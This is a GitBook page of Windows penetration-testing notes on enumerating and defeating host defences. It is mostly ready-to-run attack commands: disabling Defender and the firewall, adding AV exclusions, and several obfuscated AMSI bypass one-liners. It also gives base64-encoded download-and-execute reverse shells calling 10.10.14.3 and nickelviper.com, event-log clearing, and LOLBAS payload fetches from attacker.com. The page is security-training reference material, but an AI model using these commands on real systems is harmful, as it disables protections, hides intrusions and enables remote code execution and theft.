> For the complete documentation index, see [llms.txt](https://intrusionz3r0.gitbook.io/intrusionz3r0/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://intrusionz3r0.gitbook.io/intrusionz3r0/windows-penetration-testing/defense-enumeration.md). # Defense Enumeration ## LOLBAS {% embed url="" %} ## AV Evasion ### Enumeration 
#Windows Defender Status
PS C:\> Get-MpComputerStatus

#List AV Products
PS C:\> Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct | Select-Object displayName, productState
C:\> wmic /namespace:\\root\SecurityCenter2 path AntivirusProduct GET displayName, productState
### Disable Security Protections 
#Remove all definitions
PS C:\> cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -all

#Disable Security Protection
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true -DisableScriptScanning $true -DisableBehaviorMonitoring $true -DisableIOAVProtection $true -DisableIntrusionPreventionSystem $true

#Set exclusion AV Rules
PS C:\> Add-MpPreference -ExclusionPath "c:\temp" -ExclusionProcess "c:\temp\yourstuffs.exe"
#### Bypass tools * [DSViper](https://github.com/dagowda/DSViper) (Works! - 2025-05-01) * [PowerJoker](https://github.com/Adkali/PowerJoker) (Works! - 2025-05-01) #### Utilities * [donut](https://github.com/TheWover/donut) (Generate Shellcodes) * [InvisibilityCloak](https://github.com/h4wkst3r/InvisibilityCloak.git) (Obfuscation toolkit for C#) * [DInvoke\_shellcodeload\_CSharp](https://github.com/Kara-4search/DInvoke_shellcodeload_CSharp.git) (ShellCodeLoader via DInvoke) #### Identify Bad flags (AV/AMSI) * [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck.git) * [DefenderCheck](https://github.com/matterpreter/DefenderCheck) **Note:** Defender must be enabled on your system, but the real time protection and automatic sample submission features should be disabled. ### Techniques [Bypass AV/EDR via DInvoke + Sliver](/intrusionz3r0/windows-penetration-testing/defense-enumeration/bypass-av-edr-via-dinvoke-+-sliver.md) ## AMSI ### Enumeration {% hint style="danger" %} This script contains malicious content and has been blocked by your antivirus software. {% endhint %} ```sh #CMD (Windows Defender UID: 2781761E-28E2-4109-99FE-B9D127C57AFE) C:\Windows\System32> reg query "HKLM\SOFTWARE\Microsoft\AMSI" #Enumeration option Powershell PS C:\> Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\AMSI\' PS C:\> $amsiContext = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');if ($amsiContext) { "AMSI is enabled." } else { "AMSI is disabled." } ``` ### How to Bypass AMSI Generates obfuscated PowerShell snippets that break or disable AMSI for the current process. {% embed url="" %} **AMSI Bypass:** 
#Windows 10/11
PS C:\> class TrollAMSI{static [int] M([string]$c, [string]$s){return 1}}[System.Runtime.InteropServices.Marshal]::Copy(@([System.Runtime.InteropServices.Marshal]::ReadIntPtr([long]([TrollAMSI].GetMethods() | Where-Object Name -eq 'M').MethodHandle.Value + [long]8)),0, [long]([Ref].Assembly.GetType('System.Ma'+'nag'+'eme'+'nt.Autom'+'ation.A'+'ms'+'iU'+'ti'+'ls').GetMethods('N'+'onPu'+'blic,st'+'at'+'ic') | Where-Object Name -eq ScanContent).MethodHandle.Value + [long]8,1)

#Windows 10
PS C:\> S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
PS C:\> $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
PS C:\> (([Ref].Assembly.gettypes() | ? {$_.Name -like "Amsi*utils"}).GetFields("NonPublic,Static") | ? {$_.Name -like "amsiInit*ailed"}).SetValue($null,$true)
### Bypass reverse shell Obfuscate the script by modifing the function names, removing the comments and delete the examples section <# Remove Everything here #> ```powershell #Encode payload on Linux echo 'IEX(New-Object Net.WebClient).downloadString("http://10.10.14.3/shell.ps1")' | iconv -t UTF-16LE | base64 -w0;echo #Encode payload on Windows PS C:\> $str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))' PS C:\> [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str)) #Execute the payload PS C:\> powershell.exe powershell -nop -w hidden -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADMALwBzAGgAZQBsAGwALgBwAHMAMQAiACkACgA= PS C:\> powershell.exe -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADMALwBzAGgAZQBsAGwALgBwAHMAMQAiACkACgA= ``` ## Firewall ### Enumeration ```powershell # Check firewall status netsh advfirewall show allprofiles Get-NetFirewallProfile | Select-Object Name, Enabled # List firewall rules Get-NetFirewallRule | Where-Object { $_.Enabled -eq 'True' } | Select-Object DisplayName, Direction, Action netsh advfirewall firewall show rule name=all ``` ### Disable Firewall ```sh Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False netsh advfirewall set allprofiles state off ``` ### Manage firewall rules ```sh #Open port (Inbound outbound) netsh advfirewall firewall add rule name="Allow 1234" protocol=TCP dir=in localport=1234 action=allow netsh advfirewall firewall add rule name="Allow 1234" protocol=TCP dir=out localport=1234 action=allow netsh advfirewall firewall add rule name="Allw range ports" protocol=TCP dir=in localport=8000-9000 action=allow ``` ## EDR ### **AV Process List** | **Security Product** | **Process Names** | **Notes** | | ------------------------- | ------------------------------------------- | --------------- | | **Microsoft Defender** | `MsMpEng.exe`, `MSASCui.exe` | Built-in AV/EDR | | **CrowdStrike Falcon** | `csagent.exe`, `CSFalconService.exe` | Enterprise EDR | | **Elastic Endpoint** | `elastic-agent.exe`, `elastic-endpoint.exe` | Open-source EDR | | **Carbon Black (VMware)** | `cb.exe`, `CbDefense.exe` | Behavioral EDR | | **SentinelOne** | `SentinelAgent.exe` | Next-gen AV/EDR | | **CylancePROTECT** | `CylanceSvc.exe` | AI-based AV | | **Symantec (Broadcom)** | `ccSvcHst.exe`, `Rtvscan.exe` | Legacy AV | | **Trend Micro** | `TmCCSF.exe` | Enterprise AV | | **Kaspersky** | `avp.exe` | Common in SMEs | ### Enumeration ```powershell Get-Process | Where-Object { $_.ProcessName -match "MsMpEng|csagent|elastic|cb\.exe|Sentinel|Cylance|ccSvcHst|TmCCSF|avp|wazuh|osqueryd|sysmon" } | Select-Object Name, Id, Path ``` ## Constrained Language Mode {% embed url="" %} ```bash #Enable execution scripts Set-ExecutionPolicy Bypass -Scope Process #Get LanguageMode $executionContext.SessionState.LanguageMode #Bypass via PSBypassCLM C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.14.9 /rport=443 /U C:\\Users\\amanda\\Documents\\PsBypassCLM.exe #Bypass by using Powershell Version2 Powershell -version 2 ``` ## Applocker ### Enumeration ``` Get-AppLockerPolicy -Effective -XML | Out-File "C:\Temp\AppLockerPolicy.xml" ``` **CollectionType** * `Exe` → Executables `.exe` * `Script` → scripts `.ps1`, `.bat`, `.vbs`, etc. * `Dll` → Libraries `.dll` * `Msi` → Installers * `Appx` → Modern apps (UWP) **EnforcementMode** * `NotConfigured` → Not apply * `AuditOnly` → Logs events, but does not block. * `Enabled` → AppLocker blocks what is not allowed. > ✅ If you see AuditOnly, you are free to run without restrictions. ## Device Guard ### Enumerate ```powershell Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard ``` * `RequiredSecurityProperties`: (`2`) (Enabled). * `VirtualizationBasedSecurityStatus`: `1` (Enabled). ## LSA Protection ### Enumeration ```powershell reg query HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL (Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\LSA").RunAsPPL ``` * **`0` = Disable** (Vulnerable to mimikatz). * **`1` = Enabled** (Protect `lsass.exe`). ## User Account Control (UAC) ### Enumeration ```powershell # Check if UAC is enabled (1 = Enabled, 0 = Disabled) (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).EnableLUA reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA # Get UAC prompt behavior (0-5 values) (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin ``` #### **UAC Values** | **Registry Key** | **Value** | **Effect** | **Pentester Impact** | | ------------------------------ | ------------- | ---------------------------------------- | ------------------------------------- | | **EnableLUA** | `1` | UAC ON (default) | Blocks silent privilege escalation. | | **EnableLUA** | `0` | UAC OFF (dangerous) | **Easy admin access** (no prompts). | | **ConsentPromptBehaviorAdmin** | `0` | No prompt (auto-elevate if admin). | **Best for attackers** (no warnings). | | **ConsentPromptBehaviorAdmin** | `1` | Prompt for credentials (secure desktop). | Needs creds/phishing. | | **ConsentPromptBehaviorAdmin** | `2` (Default) | Prompt for confirmation. | User interaction needed. | | **ConsentPromptBehaviorAdmin** | `5` | Prompt only for non-Windows binaries. | Bypassable with LOLBins. | ## Event Log Cleansing ```sh wevtutil cl Security wevtutil cl System wevtutil cl Application ``` ## Writeable paths for non-admins ``` C:\Windows\Tasks C:\Windows\Temp C:\windows\tracing C:\Windows\Registration\CRMLog C:\Windows\System32\FxsTmp C:\Windows\System32\com\dmp C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys C:\Windows\System32\spool\PRINTERS C:\Windows\System32\spool\SERVERS C:\Windows\System32\spool\drivers\color C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter C:\Windows\System32\Tasks_Migrated (after peforming a version upgrade of Windows 10) C:\Windows\SysWOW64\FxsTmp C:\Windows\SysWOW64\com\dmp C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System ``` ## LOLBAS Usefull Commands to Bypass Security Solutions #### `regsvr32.exe` – Remote Code Execution (No Disk Write) **Bypasses AMSI, AV, AppLocker** ```bash regsvr32 /s /n /u /i:http://attacker.com/payload.sct scrobj.dll ``` * Executes remote scriptlet files (.sct) from memory. * No file touches disk. * Evades logging and bypasses AV heuristics. *** #### `mshta.exe` – HTML Application Loader **Bypasses AppLocker and basic AV** ```bash mshta http://attacker.com/payload.hta ``` Or run inline script: ```bash mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -nop -w hidden -enc """) ``` *** #### `powershell.exe` with Base64 Payload **Bypasses basic AV and logs** ```bash powershell -nop -w hidden -enc ``` * Use with encoded payloads to evade string-based detection. * Add `-version 2` to bypass AMSI and Constrained Language Mode (on older systems). *** #### `rundll32.exe` – DLL Execution or COM Exploit **AppLocker bypass, script execution** ```bash rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://attacker.com/shell.sct"); ``` Or execute exported function from a malicious DLL: ```bash rundll32.exe payload.dll,ExportedFunction ``` *** #### `InstallUtil.exe` – .NET Binary Execution **Bypasses CLM, AppLocker** ```bash InstallUtil.exe /logfile= /LogToConsole=true /U payload.exe ``` * `payload.exe` must override the `Uninstall()` method. * Can be executed under .NET framework paths. *** #### `certutil.exe` – Download and Decode Payloads **Network evasion, no PowerShell** ```bash # Download file from remote server certutil -urlcache -split -f http://attacker.com/malware.exe evil.exe # Decode a base64 payload certutil -decode payload.b64 payload.exe ``` *** #### `forfiles.exe` – Execute Command as File Handler **UAC bypass and execution** ```bash forfiles /p C:\ /m notepad.exe /c "cmd /c calc.exe" ``` *** #### `wmic.exe` – Execute Commands Without PowerShell or CMD ```bash wmic process call create "cmd.exe /c calc.exe" ``` * Executes commands without PowerShell, can evade detection. *** #### `schtasks.exe` – Schedule Execution (Persistence + Evasion) ```bash schtasks /create /tn "Updater" /tr "powershell.exe -enc " /sc onlogon /ru SYSTEM ``` * Often whitelisted. * Useful for persistent or delayed payloads. *** #### `scriptrunner.exe` – Executes Scripts via Signed Binary (SCCM) ```bash scriptrunner.exe -appvscript payload.bat ``` * Executes scripts using a trusted Microsoft-signed binary. *** #### `msbuild.exe` – Inline C# Payload Execution ```xml ``` Then run: 
msbuild.exe payload.xml
--- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://intrusionz3r0.gitbook.io/intrusionz3r0/windows-penetration-testing/defense-enumeration.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.